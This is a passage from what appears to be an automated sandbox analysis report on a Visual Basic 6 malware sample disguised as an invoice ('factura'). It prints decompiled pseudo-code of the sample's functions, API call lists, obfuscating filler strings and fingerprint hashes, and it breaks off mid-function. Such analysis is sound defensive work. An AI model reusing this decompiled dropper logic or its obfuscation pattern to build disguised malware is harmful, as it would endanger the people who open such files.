        • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 004081FE
        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 0040820B
        • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,00003145,000DF661,0013A44F,?,00741641,C9BFD870,00005B04,00003B49), ref: 00408218
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000700,?,?,?,00001107), ref: 00408265
        • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00001107,?,?,?,?,?,?,?,?,00003145), ref: 00408283
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000704), ref: 004082CC
        • __vbaStrCopy.MSVBVM60 ref: 00408350
        • __vbaFreeStr.MSVBVM60 ref: 0040837B
        • __vbaStrCopy.MSVBVM60 ref: 00408388
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000708,?,?,004D098C,Udsendes4,?), ref: 00408402
        • __vbaFreeStr.MSVBVM60(?,?,004D098C,Udsendes4,?), ref: 00408419
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,0000070C,?,?,004D098C,Udsendes4,?), ref: 0040848E
        • __vbaStrCopy.MSVBVM60(?,?,004D098C,Udsendes4,?), ref: 004084AA
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000710,?,?,004D098C,Udsendes4,?), ref: 004084EF
        • __vbaFreeStr.MSVBVM60(?,?,004D098C,Udsendes4,?), ref: 00408511
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000714,?,?,004D098C,Udsendes4,?), ref: 0040854D
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,00402484,000002B4,?,?,004D098C,Udsendes4,?), ref: 0040859C
        • __vbaVarAdd.MSVBVM60(?,00000002,?,?,?,004D098C,Udsendes4,?), ref: 004085D0
        • __vbaVarMove.MSVBVM60(?,00000002,?,?,?,004D098C,Udsendes4,?), ref: 004085DA
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000718,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,00008003), ref: 0040867F
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,0000071C,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,00008003), ref: 004086D5
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000720,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,00008003), ref: 0040876E
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000724,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,00008003), ref: 004087C4
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,00000728,?,000061B6,00000000,00401218,004024B4,00000724,?,?,0050E1E2,D97A0BC0,0000454C,?), ref: 00408858
        • __vbaStrCopy.MSVBVM60(?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,?,?,004D098C), ref: 00408874
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401218,004024B4,0000072C,?,000061B6,00000000,00401218,004024B4,00000724,?,?,0050E1E2,D97A0BC0,0000454C,?), ref: 004088C5
        • __vbaFreeStr.MSVBVM60(?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?,?,?,004D098C), ref: 004088EE
        • __vbaVarTstLt.MSVBVM60(00008003,?,?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?), ref: 00408951
        • __vbaFreeVar.MSVBVM60(004089B9,?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?), ref: 004089A8
        • __vbaAryDestruct.MSVBVM60(00000000,?,004089B9,?,000061B6,?,?,0050E1E2,D97A0BC0,0000454C,?,4F19E8C0,?,?,00000002,?), ref: 004089B3
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$CheckHresult$Free$Copy$Move$Chkstk$#519#569#591DestructListNew2Var2
        • String ID: tt$BENAMES$BIBLIOTEKSASSISTENT$Barreleye$Integer$LE$REJUVENIZING$Reklappers$Skibakker3$TOLDPOSTKONTORET$Transcriptional9$Trifliers$Udsendes4$Unbetide1$Unfixedness1$VASKERIERNES$kartoffelkurens$keelboatman$lon
        • API String ID: 3969615492-959738972
        • Opcode ID: 75923ee7f48a88740aae2c0ec33775fa50e63ae8930f29e2fa7183d69f504eea
        • Instruction ID: 58eea6c1f6c0e0eb42e2cfcb6a9ae7b55d479f3acebccef80e5b5a666d87eff4
        • Opcode Fuzzy Hash: 75923ee7f48a88740aae2c0ec33775fa50e63ae8930f29e2fa7183d69f504eea
        • Instruction Fuzzy Hash: 3362F675900218EFDB11DF90CD89BDDBBB9AF08304F0084EAE549BB1A1DB795A88CF55
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 61%
        			E0040904F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				void* _v28;
        				signed int _v32;
        				char _v36;
        				char _v52;
        				char _v68;
        				intOrPtr _v92;
        				intOrPtr _v100;
        				intOrPtr _v108;
        				char _v116;
        				signed int _v120;
        				void* _v124;
        				signed int _v128;
        				signed int _v140;
        				signed int _v144;
        				signed int _v148;
        				intOrPtr* _v152;
        				signed int _v156;
        				signed int _t72;
        				short _t74;
        				signed int _t77;
        				signed int _t81;
        				char* _t85;
        				void* _t98;
        				void* _t100;
        				intOrPtr _t101;
        
        				_t101 = _t100 - 0xc;
        				 *[fs:0x0] = _t101;
        				L00401420();
        				_v16 = _t101;
        				_v12 = 0x4012a8;
        				_v8 = 0;
        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t98);
        				_push(L"4:4:4");
        				_push( &_v52); // executed
        				L004015AC(); // executed
        				_push( &_v52);
        				L004015B2();
        				L00401678();
        				L0040164E();
        				_v92 = 0x4029a8;
        				_v100 = 8;
        				L004015BE();
        				_push( &_v68);
        				_t72 =  &_v52;
        				_push(_t72);
        				L004015A6();
        				_v120 = _t72;
        				if(_v120 >= 0) {
        					_v144 = _v144 & 0x00000000;
        				} else {
        					_push(_v120);
        					L004015A0();
        					_v144 = _t72;
        				}
        				_v108 = 2;
        				_v116 = 0x8002;
        				_push( &_v68);
        				_t74 =  &_v116;
        				_push(_t74);
        				L00401612();
        				_v124 = _t74;
        				_push( &_v68);
        				_push( &_v52);
        				_push(2);
        				L00401600();
        				_t77 = _v124;
        				if(_t77 != 0) {
        					_t81 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v32);
        					asm("fclex");
        					_v120 = _t81;
        					if(_v120 >= 0) {
        						_v148 = _v148 & 0x00000000;
        					} else {
        						_push(0x160);
        						_push(0x402484);
        						_push(_a4);
        						_push(_v120);
        						L00401654();
        						_v148 = _t81;
        					}
        					if( *0x40c33c != 0) {
        						_v152 = 0x40c33c;
        					} else {
        						_push(0x40c33c);
        						_push(0x4026e4);
        						L0040165A();
        						_v152 = 0x40c33c;
        					}
        					_v124 =  *_v152;
        					_v140 = _v32;
        					_v32 = _v32 & 0x00000000;
        					_t85 =  &_v36;
        					L0040159A();
        					_t77 =  *((intOrPtr*)( *_v124 + 0x40))(_v124, _t85, _t85, _v140, L"Prfekt");
        					asm("fclex");
        					_v128 = _t77;
        					if(_v128 >= 0) {
        						_v156 = _v156 & 0x00000000;
        					} else {
        						_push(0x40);
        						_push(0x4026d4);
        						_push(_v124);
        						_push(_v128);
        						L00401654();
        						_v156 = _t77;
        					}
        					L004015E8();
        				}
        				_push(E00409251);
        				L0040166C();
        				return _t77;
        			}































        0x00409052
        0x00409061
        0x0040906d
        0x00409075
        0x00409078
        0x0040907f
        0x0040908e
        0x00409091
        0x00409099
        0x0040909a
        0x004090a2
        0x004090a3
        0x004090ad
        0x004090b5
        0x004090ba
        0x004090c1
        0x004090ce
        0x004090d6
        0x004090d7
        0x004090da
        0x004090db
        0x004090e0
        0x004090e7
        0x004090f9
        0x004090e9
        0x004090e9
        0x004090ec
        0x004090f1
        0x004090f1
        0x00409100
        0x00409107
        0x00409111
        0x00409112
        0x00409115
        0x00409116
        0x0040911b
        0x00409122
        0x00409126
        0x00409127
        0x00409129
        0x00409131
        0x00409137
        0x00409149
        0x0040914f
        0x00409151
        0x00409158
        0x00409177
        0x0040915a
        0x0040915a
        0x0040915f
        0x00409164
        0x00409167
        0x0040916a
        0x0040916f
        0x0040916f
        0x00409185
        0x004091a2
        0x00409187
        0x00409187
        0x0040918c
        0x00409191
        0x00409196
        0x00409196
        0x004091b4
        0x004091ba
        0x004091c0
        0x004091cf
        0x004091d3
        0x004091e1
        0x004091e4
        0x004091e6
        0x004091ed
        0x00409209
        0x004091ef
        0x004091ef
        0x004091f1
        0x004091f6
        0x004091f9
        0x004091fc
        0x00409201
        0x00409201
        0x00409213
        0x00409213
        0x00409218
        0x0040924b
        0x00409250

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 0040906D
        • #541.MSVBVM60(?,4:4:4,?,?,?,?,00401426), ref: 0040909A
        • __vbaStrVarMove.MSVBVM60(?,?,4:4:4,?,?,?,?,00401426), ref: 004090A3
        • __vbaStrMove.MSVBVM60(?,?,4:4:4,?,?,?,?,00401426), ref: 004090AD
        • __vbaFreeVar.MSVBVM60(?,?,4:4:4,?,?,?,?,00401426), ref: 004090B5
        • __vbaVarDup.MSVBVM60 ref: 004090CE
        • #564.MSVBVM60(?,?), ref: 004090DB
        • __vbaHresultCheck.MSVBVM60(00000000,?,?,?,?,?), ref: 004090EC
        • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409116
        • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409129
        • __vbaHresultCheckObj.MSVBVM60(00000000,004012A8,00402484,00000160), ref: 0040916A
        • __vbaNew2.MSVBVM60(004026E4,0040C33C), ref: 00409191
        • __vbaObjSet.MSVBVM60(?,?,Prfekt), ref: 004091D3
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000040), ref: 004091FC
        • __vbaFreeObj.MSVBVM60(00000000,?,004026D4,00000040), ref: 00409213
        • __vbaFreeStr.MSVBVM60(00409251,?,?,00401426), ref: 0040924B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$Free$CheckHresult$Move$#541#564ChkstkListNew2
        • String ID: 4:4:4$Prfekt
        • API String ID: 2750142420-1222765967
        • Opcode ID: caa23575c8c7f9b307eea9d9599f931be28e7c9817a3529497de66f5a474cb34
        • Instruction ID: 41371d639fe381b2094cfec91c1024bd5da65ec87b9d48852d0929f8c8f3d5c1
        • Opcode Fuzzy Hash: caa23575c8c7f9b307eea9d9599f931be28e7c9817a3529497de66f5a474cb34
        • Instruction Fuzzy Hash: CD51F470910219AFDB10EFA1CC89BDDBBB4BB04704F20857EE005BB1A2DB7999858F58
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 65%
        			E0040A9C4(void* __ebx, void* __edi, void* __esi, void* __eflags, long long __fp0, intOrPtr* _a4) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				long long* _v16;
        				void* _v28;
        				intOrPtr _v32;
        				intOrPtr _v36;
        				char _v52;
        				char* _v60;
        				intOrPtr _v68;
        				char* _t28;
        				char* _t32;
        				void* _t41;
        				void* _t43;
        				long long* _t44;
        
        				_t44 = _t43 - 0xc;
        				 *[fs:0x0] = _t44;
        				L00401420();
        				_v16 = _t44;
        				_v12 = 0x4013e8;
        				_v8 = 0;
        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401426, _t41);
        				_v60 = L"HLDNINGSKOEFFICIENTERS";
        				_v68 = 8;
        				L004015BE();
        				_push(0);
        				_t28 =  &_v52;
        				_push(_t28); // executed
        				L004014CE(); // executed
        				L00401678();
        				_t32 =  &_v52;
        				L0040164E();
        				asm("fldz");
        				_push(_t32);
        				_push(_t32);
        				 *_t44 = __fp0;
        				L004015B8();
        				L004015F4();
        				asm("fcomp qword [0x401280]");
        				asm("fnstsw ax");
        				asm("sahf");
        				if(__eflags != 0) {
        					_v60 = L"Helligaftenens";
        					_v68 = 8;
        					L004015BE();
        					_t28 =  &_v52;
        					_push(_t28);
        					L004015C4();
        					L0040164E();
        				}
        				_v36 = 0x2986ba0;
        				_v32 = 0x5af9;
        				asm("wait");
        				_push(E0040AAA8);
        				L0040166C();
        				return _t28;
        			}

















        0x0040a9c7
        0x0040a9d6
        0x0040a9e0
        0x0040a9e8
        0x0040a9eb
        0x0040a9f2
        0x0040aa01
        0x0040aa04
        0x0040aa0b
        0x0040aa18
        0x0040aa1d
        0x0040aa1f
        0x0040aa22
        0x0040aa23
        0x0040aa2d
        0x0040aa32
        0x0040aa35
        0x0040aa3a
        0x0040aa3c
        0x0040aa3d
        0x0040aa3e
        0x0040aa41
        0x0040aa46
        0x0040aa4b
        0x0040aa51
        0x0040aa53
        0x0040aa54
        0x0040aa56
        0x0040aa5d
        0x0040aa6a
        0x0040aa6f
        0x0040aa72
        0x0040aa73
        0x0040aa7b
        0x0040aa7b
        0x0040aa80
        0x0040aa87
        0x0040aa8e
        0x0040aa8f
        0x0040aaa2
        0x0040aaa7

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 0040A9E0
        • __vbaVarDup.MSVBVM60 ref: 0040AA18
        • #645.MSVBVM60(?,00000000), ref: 0040AA23
        • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040AA2D
        • __vbaFreeVar.MSVBVM60(?,00000000), ref: 0040AA35
        • #583.MSVBVM60(?,?,?,00000000), ref: 0040AA41
        • __vbaFpR8.MSVBVM60(?,?,?,00000000), ref: 0040AA46
        • __vbaVarDup.MSVBVM60(?,?,?,00000000), ref: 0040AA6A
        • #529.MSVBVM60(?,?,?,?,00000000), ref: 0040AA73
        • __vbaFreeVar.MSVBVM60(?,?,?,?,00000000), ref: 0040AA7B
        • __vbaFreeStr.MSVBVM60(0040AAA8,?,?,?,00000000), ref: 0040AAA2
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$Free$#529#583#645ChkstkMove
        • String ID: HLDNINGSKOEFFICIENTERS$Helligaftenens
        • API String ID: 110701385-4233214299
        • Opcode ID: 2dd96d7949b1b6051845cdd1a18a3b203c5a2e28b41c7b02710b4a2105d7144b
        • Instruction ID: c7fdd88793d244dd19188db00eeed8981e08a2ab43351aaa0d3f4e0787805d05
        • Opcode Fuzzy Hash: 2dd96d7949b1b6051845cdd1a18a3b203c5a2e28b41c7b02710b4a2105d7144b
        • Instruction Fuzzy Hash: 0221D370910218ABDB04EF91DD9AADEBBB8BF40708F44852AF4017A1E1DB785949CB89
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Control-flow Graph

        C-Code - Quality: 55%
        			E00409AFC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				void* _v28;
        				intOrPtr _v32;
        				char _v36;
        				char _v40;
        				intOrPtr _v48;
        				char _v56;
        				signed int _v64;
        				char _v72;
        				intOrPtr _v80;
        				char _v88;
        				intOrPtr _v96;
        				char _v104;
        				char _v120;
        				signed char _v188;
        				signed int _v192;
        				signed char _v204;
        				signed int _v208;
        				signed int _v212;
        				char _v216;
        				signed int _v220;
        				signed int _t80;
        				char* _t91;
        				signed char _t99;
        				char* _t107;
        				void* _t114;
        				void* _t116;
        				intOrPtr _t117;
        				intOrPtr* _t118;
        				signed long long _t122;
        
        				_t117 = _t116 - 0xc;
        				 *[fs:0x0] = _t117;
        				L00401420();
        				_v16 = _t117;
        				_v12 = 0x401348;
        				_v8 = 0;
        				_t80 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t114);
        				L0040163C();
        				_push(0x402aa0);
        				L0040153A();
        				_push(_t80);
        				L00401540();
        				L00401678();
        				_push(_t80);
        				_push(0x402ab0);
        				L0040167E();
        				asm("sbb eax, eax");
        				_v188 =  ~( ~( ~_t80));
        				L0040166C();
        				if(_v188 != 0) {
        					if( *0x40c33c != 0) {
        						_v204 = 0x40c33c;
        					} else {
        						_push(0x40c33c);
        						_push(0x4026e4);
        						L0040165A();
        						_v204 = 0x40c33c;
        					}
        					_v204 =  *_v204;
        					_v188 =  *_v204;
        					__eax =  &_v56;
        					L0040152E();
        					__esp = __esp + 0x10;
        					L00401534();
        					__eax =  &_v40;
        					L00401582();
        					_v188 =  *_v188;
        					__eax =  *((intOrPtr*)( *_v188 + 0xc))(_v188, __eax, __eax, __eax, __eax, __eax, _v32, L"CYtZi0nszoU4nj128", 0);
        					asm("fclex");
        					_v192 = __eax;
        					if(_v192 >= 0) {
        						_v208 = _v208 & 0x00000000;
        					} else {
        						_push(0xc);
        						_push(0x4026d4);
        						_push(_v188);
        						_push(_v192);
        						L00401654();
        						_v208 = __eax;
        					}
        					L004015E8();
        					L0040164E();
        				}
        				_v96 = 5;
        				_v104 = 2;
        				_v80 = 0x63;
        				_v88 = 2;
        				_t36 =  &_v64;
        				 *_t36 = _v64 & 0x00000000;
        				_v72 = 2;
        				_v48 = 0x64;
        				_v56 = 2;
        				_push( &_v104);
        				_push( &_v88);
        				_push( &_v72);
        				_push( &_v56);
        				_push( &_v120);
        				L0040151C();
        				_push( &_v120);
        				_t91 =  &_v36;
        				_push(_t91);
        				L00401522();
        				_push(_t91);
        				L00401528();
        				L004015F4();
        				asm("fcomp qword [0x401340]");
        				asm("fnstsw ax");
        				asm("sahf");
        				if( *_t36 == 0) {
        					_v212 = _v212 & 0x00000000;
        				} else {
        					_v212 = 1;
        				}
        				_v188 =  ~_v212;
        				_t107 =  &_v36;
        				L0040166C();
        				_push( &_v120);
        				_push( &_v104);
        				_push( &_v88);
        				_push( &_v72);
        				_push( &_v56);
        				_push(5);
        				L00401600();
        				_t118 = _t117 + 0x18;
        				_t99 = _v188;
        				if(_t99 != 0) {
        					_push(_t107);
        					 *_t118 =  *0x401338;
        					_t122 =  *0x401330 *  *0x401328;
        					if( *0x40c000 != 0) {
        						_push( *0x401294);
        						_push( *0x401290);
        						L00401444();
        					} else {
        						_t122 = _t122 /  *0x401290;
        					}
        					asm("fnstsw ax");
        					if((_t99 & 0x0000000d) != 0) {
        						return __imp____vbaFPException();
        					}
        					_v216 = _t122;
        					_v104 = _v216;
        					 *_t118 =  *0x401320;
        					L00401516();
        					 *_t118 =  *0x401310;
        					_v120 =  *0x40130c;
        					 *_t118 =  *0x401308;
        					_t99 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t107, _t107, _t107, _t99, _t107, _t107);
        					asm("fclex");
        					_v188 = _t99;
        					if(_v188 >= 0) {
        						_v220 = _v220 & 0x00000000;
        					} else {
        						_push(0x2c0);
        						_push(0x402484);
        						_push(_a4);
        						_push(_v188);
        						L00401654();
        						_v220 = _t99;
        					}
        				}
        				asm("wait");
        				_push(E00409E31);
        				L0040166C();
        				L004015E8();
        				return _t99;
        			}



































        0x00409aff
        0x00409b0e
        0x00409b1a
        0x00409b22
        0x00409b25
        0x00409b2c
        0x00409b3b
        0x00409b44
        0x00409b49
        0x00409b4e
        0x00409b53
        0x00409b54
        0x00409b5e
        0x00409b63
        0x00409b64
        0x00409b69
        0x00409b70
        0x00409b76
        0x00409b80
        0x00409b8e
        0x00409b9b
        0x00409bb8
        0x00409b9d
        0x00409b9d
        0x00409ba2
        0x00409ba7
        0x00409bac
        0x00409bac
        0x00409bc8
        0x00409bca
        0x00409bda
        0x00409bde
        0x00409be3
        0x00409be7
        0x00409bed
        0x00409bf1
        0x00409bfd
        0x00409c05
        0x00409c08
        0x00409c0a
        0x00409c17
        0x00409c39
        0x00409c19
        0x00409c19
        0x00409c1b
        0x00409c20
        0x00409c26
        0x00409c2c
        0x00409c31
        0x00409c31
        0x00409c43
        0x00409c4b
        0x00409c4b
        0x00409c50
        0x00409c57
        0x00409c5e
        0x00409c65
        0x00409c6c
        0x00409c6c
        0x00409c70
        0x00409c77
        0x00409c7e
        0x00409c88
        0x00409c8c
        0x00409c90
        0x00409c94
        0x00409c98
        0x00409c99
        0x00409ca1
        0x00409ca2
        0x00409ca5
        0x00409ca6
        0x00409cab
        0x00409cac
        0x00409cb1
        0x00409cb6
        0x00409cbc
        0x00409cbe
        0x00409cbf
        0x00409ccd
        0x00409cc1
        0x00409cc1
        0x00409cc1
        0x00409cdc
        0x00409ce3
        0x00409ce6
        0x00409cee
        0x00409cf2
        0x00409cf6
        0x00409cfa
        0x00409cfe
        0x00409cff
        0x00409d01
        0x00409d06
        0x00409d09
        0x00409d12
        0x00409d1e
        0x00409d1f
        0x00409d28
        0x00409d35
        0x00409d3f
        0x00409d45
        0x00409d4b
        0x00409d37
        0x00409d37
        0x00409d37
        0x00409d50
        0x00409d54
        0x0040142c
        0x0040142c
        0x00409d5a
        0x00409d67
        0x00409d71
        0x00409d7a
        0x00409d87
        0x00409d91
        0x00409d9b
        0x00409dab
        0x00409db1
        0x00409db3
        0x00409dc0
        0x00409de2
        0x00409dc2
        0x00409dc2
        0x00409dc7
        0x00409dcc
        0x00409dcf
        0x00409dd5
        0x00409dda
        0x00409dda
        0x00409dc0
        0x00409de9
        0x00409dea
        0x00409e23
        0x00409e2b
        0x00409e30

        APIs
        • __vbaChkstk.MSVBVM60(?,00401426), ref: 00409B1A
        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401426), ref: 00409B44
        • __vbaI4Str.MSVBVM60(00402AA0,?,?,?,?,00401426), ref: 00409B4E
        • #537.MSVBVM60(00000000,00402AA0,?,?,?,?,00401426), ref: 00409B54
        • __vbaStrMove.MSVBVM60(00000000,00402AA0,?,?,?,?,00401426), ref: 00409B5E
        • __vbaStrCmp.MSVBVM60(00402AB0,00000000,00000000,00402AA0,?,?,?,?,00401426), ref: 00409B69
        • __vbaFreeStr.MSVBVM60(00402AB0,00000000,00000000,00402AA0,?,?,?,?,00401426), ref: 00409B80
        • __vbaNew2.MSVBVM60(004026E4,0040C33C,00402AB0,00000000,00000000,00402AA0,?,?,?,?,00401426), ref: 00409BA7
        • __vbaLateMemCallLd.MSVBVM60(?,?,CYtZi0nszoU4nj128,00000000), ref: 00409BDE
        • __vbaObjVar.MSVBVM60(00000000,?,?,?,00401426), ref: 00409BE7
        • __vbaObjSetAddref.MSVBVM60(00000000,00000000,00000000,?,?,?,00401426), ref: 00409BF1
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,0000000C), ref: 00409C2C
        • __vbaFreeObj.MSVBVM60(00000000,?,004026D4,0000000C), ref: 00409C43
        • __vbaFreeVar.MSVBVM60(00000000,?,004026D4,0000000C), ref: 00409C4B
        • #664.MSVBVM60(?,00000002,00000002,00000002,00000002), ref: 00409C99
        • __vbaStrVarVal.MSVBVM60(?,?,?,00000002,00000002,00000002,00000002), ref: 00409CA6
        • #581.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 00409CAC
        • __vbaFpR8.MSVBVM60(00000000,?,?,?,00000002,00000002,00000002,00000002), ref: 00409CB1
        • __vbaFreeStr.MSVBVM60 ref: 00409CE6
        • __vbaFreeVarList.MSVBVM60(00000005,00000002,00000002,00000002,00000002,?), ref: 00409D01
        • _adj_fdiv_m64.MSVBVM60(?,00402AA0,?,?,?,?,00401426), ref: 00409D4B
        • __vbaFpI4.MSVBVM60(?,?,?,00402AA0,?,?,?,?,00401426), ref: 00409D7A
        • __vbaHresultCheckObj.MSVBVM60(00000000,00401348,00402484,000002C0), ref: 00409DD5
        • __vbaFreeStr.MSVBVM60(00409E31,00402AA0,?,?,?,?,00401426), ref: 00409E23
        • __vbaFreeObj.MSVBVM60(00409E31,00402AA0,?,?,?,?,00401426), ref: 00409E2B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
        • Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_factura.jbxd
        Similarity
        • API ID: __vba$Free$CheckHresult$#537#581#664AddrefCallChkstkCopyLateListMoveNew2_adj_fdiv_m64
        • String ID: CYtZi0nszoU4nj128$c$d
        • API String ID: 1323223818-1097554447
        • Opcode ID: 9614dbe5ba8fc78f88294aacd65c5b76729fed4fb822a5ff126b05c5e3e9a693
        • Instruction ID: 65f10a347b61fb2c19abb23df9cb3c85e1a65150574fff23945548838faf25c7
        • Opcode Fuzzy Hash: 9614dbe5ba8fc78f88294aacd65c5b76729fed4fb822a5ff126b05c5e3e9a693
        • Instruction Fuzzy Hash: 22812C71900208EBDB10EF91DD89BDEB7B8BF04704F1085AAF509B61E1DB795A84CF59
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 56%
        			E004098BB(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a28) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				intOrPtr _v28;
        				intOrPtr _v32;
        				void* _v36;
        				void* _v40;
        				char _v44;
        				char _v48;
        				char _v64;
        				intOrPtr _v72;
        				intOrPtr _v80;
        				void* _v84;
        				signed int _v88;
        				intOrPtr* _v92;
        				signed int _v96;
        				intOrPtr* _v108;
        				signed int _v112;
        				signed int _v116;
        				signed int _t66;
        				signed int _t71;
        				char* _t75;
        				signed int _t81;
        				void* _t83;
        				char* _t84;
        				signed int _t87;
        				void* _t110;
        				void* _t112;
        				intOrPtr _t113;
        
        				_t113 = _t112 - 0xc;
        				 *[fs:0x0] = _t113;
        				L00401420();
        				_v16 = _t113;
        				_v12 = 0x4012f8;
        				_v8 = 0;
        				_t66 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x5c,  *[fs:0x0], 0x401426, _t110);
        				L0040163C();
        				L0040163C();
        				_push(2);
        				_push(_v32);
        				L00401558();
        				L00401678();
        				_push(_t66);
        				_push(0x402954);
        				L0040167E();
        				asm("sbb eax, eax");
        				_v84 =  ~( ~( ~_t66));
        				L0040166C();
        				if(_v84 != 0) {
        					_push(1);
        					_push(L"KNLE");
        					L00401552();
        				}
        				_v72 = 0x402a74;
        				_v80 = 8;
        				L004015BE();
        				_t71 =  &_v64;
        				_push(_t71);
        				L0040154C();
        				L00401678();
        				_push(_t71);
        				_push(0);
        				L0040167E();
        				asm("sbb eax, eax");
        				_v84 =  ~( ~_t71 + 1);
        				L0040166C();
        				L0040164E();
        				_t75 = _v84;
        				if(_t75 != 0) {
        					if( *0x40c33c != 0) {
        						_v108 = 0x40c33c;
        					} else {
        						_push(0x40c33c);
        						_push(0x4026e4);
        						L0040165A();
        						_v108 = 0x40c33c;
        					}
        					_v84 =  *_v108;
        					_t81 =  *((intOrPtr*)( *_v84 + 0x1c))(_v84,  &_v44);
        					asm("fclex");
        					_v88 = _t81;
        					if(_v88 >= 0) {
        						_v112 = _v112 & 0x00000000;
        					} else {
        						_push(0x1c);
        						_push(0x4026d4);
        						_push(_v84);
        						_push(_v88);
        						L00401654();
        						_v112 = _t81;
        					}
        					_v92 = _v44;
        					_v72 = 1;
        					_v80 = 2;
        					_t83 = 0x10;
        					L00401420();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					L00401546();
        					_t84 =  &_v48;
        					L0040159A();
        					_t87 =  *((intOrPtr*)( *_v92 + 0x58))(_v92, _t84, _t84, _t83, _v28, 0x402a7c);
        					asm("fclex");
        					_v96 = _t87;
